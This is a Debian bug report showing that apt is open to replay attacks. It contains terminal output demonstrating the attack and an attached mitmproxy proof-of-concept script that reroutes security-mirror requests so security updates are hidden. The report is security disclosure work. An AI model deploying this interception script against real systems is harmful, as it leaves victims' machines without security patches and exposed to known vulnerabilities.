Bug#863317: apt: susceptible to replay attacks
Package: apt
Version: 1.0.9.8.4
Tags: security
Nearly a decade ago, Valid-Until fields were added to Release files (bug
#499897). The primary motivation for this was to protect from a
man-in-the-middle adversary from serving an outdated copy of the security
mirror.
Unfortunately, this protection is ineffective. All the attacker needs to do to
hide security updates is to replace all the files from
http://security.debian.org/dists/$DIST/updates/ with the ones from
http://deb.debian.org/debian/dists/$DIST/ .
I've attached a proof-of-concept mitmproxy script that implements this attack:
# apt-cache policy bitlbee
bitlbee:
Installed: (none)
Candidate: 3.2.2-2+deb8u1
Version table:
3.2.2-2+deb8u1 0
500 http://security.debian.org/ jessie/updates/main i386 Packages
3.2.2-2 0
500 http://http.us.debian.org/debian/ jessie/main i386 Packages
# apt-get update -o Acquire::http::Proxy=http://127.0.0.1:8080
Ign http://http.us.debian.org jessie InRelease
Hit http://http.us.debian.org jessie-updates InRelease
Hit http://http.us.debian.org jessie Release.gpg
Ign http://security.debian.org jessie/updates InRelease
Get:1 http://http.us.debian.org jessie-updates/main i386 Packages/DiffIndex [7900 B]
Get:2 http://security.debian.org jessie/updates Release.gpg [2373 B]
Hit http://http.us.debian.org jessie Release
Hit http://http.us.debian.org jessie/main i386 Packages
Get:3 http://security.debian.org jessie/updates Release [148 kB]
Get:4 http://security.debian.org jessie/updates/main i386 Packages [6793 kB]
Fetched 6952 kB in 7s (978 kB/s)
Reading package lists... Done
# apt-cache policy bitlbee
bitlbee:
Installed: (none)
Candidate: 3.2.2-2
Version table:
3.2.2-2 0
500 http://http.us.debian.org/debian/ jessie/main i386 Packages
500 http://security.debian.org/ jessie/updates/main i386 Packages
-- System Information:
Debian Release: 8.8
APT prefers stable-updates
APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: i386 (i686)
Kernel: Linux 3.16.0-4-686-pae (SMP w/1 CPU core)
Locale: LANG=C, LC_CTYPE=pl_PL.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)
Versions of packages apt depends on:
ii debian-archive-keyring 2014.3
ii gnupg 1.4.18-7+deb8u3
ii libapt-pkg4.12 1.0.9.8.4
ii libc6 2.19-18+deb8u9
ii libgcc1 1:4.9.2-10
ii libstdc++6 4.9.2-10
--
Jakub Wilk
# Usage: mitmproxy [options] -s no-security.d.o.py
try:
import mitmproxy
except ImportError: # mitmproxy < 0.18
def request(ctx, flow):
return _request(flow)
else: # mitmproxy >= 0.18
def request(flow):
return _request(flow)
def _request(flow):
if flow.request.host == 'security.debian.org' and flow.request.port == 80:
flow.request.anticache()
flow.request.path = '/debian' + flow.request.path.replace('/updates/', '/')
flow.request.host = 'deb.debian.org'
flow.request.headers['Host'] = ['deb.debian.org']
flow.scheme = 'http'
# vim:ts=4 sts=4 sw=4 et
Reply to: